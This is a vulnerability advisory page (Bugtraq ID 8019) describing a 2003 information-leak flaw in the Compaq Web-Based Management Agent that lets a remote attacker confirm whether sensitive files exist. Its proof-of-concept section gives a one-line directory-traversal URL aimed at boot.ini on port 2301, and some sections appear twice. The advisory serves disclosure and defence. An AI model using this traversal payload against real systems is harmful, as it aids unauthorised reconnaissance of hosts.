Compaq Web-Based Management Agent Remote File Verification Vulnerability
BID:8019
Info
Compaq Web-Based Management Agent Remote File Verification Vulnerability
| Bugtraq ID: | 8019 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jun 23 2003 12:00AM |
| Updated: | Jun 23 2003 12:00AM |
| Credit: | Discovery credited to Ian Vitek. |
| Vulnerable: |
Compaq Web-Based Management Agent |
| Not Vulnerable: | |
Discussion
Compaq Web-Based Management Agent Remote File Verification Vulnerability
Compaq Web-Based Management Agent has been reported vulnerable to a remote file verification vulnerability. This information leak could be exploited by an attacker to verify the existence of sensitive files on a vulnerable system.
Compaq Web-Based Management Agent has been reported vulnerable to a remote file verification vulnerability. This information leak could be exploited by an attacker to verify the existence of sensitive files on a vulnerable system.
Exploit / POC
Compaq Web-Based Management Agent Remote File Verification Vulnerability
No exploit is required for this vulnerability.
The following proof-of-concept has been made available:
http://www.example.com:2301/<!.DebugSearchPaths>?Url=%2F..%2F..%2F..%2F..%2Fboot.ini
No exploit is required for this vulnerability.
The following proof-of-concept has been made available:
http://www.example.com:2301/<!.DebugSearchPaths>?Url=%2F..%2F..%2F..%2F..%2Fboot.ini
References
Compaq Web-Based Management Agent Remote File Verification Vulnerability
References:
References: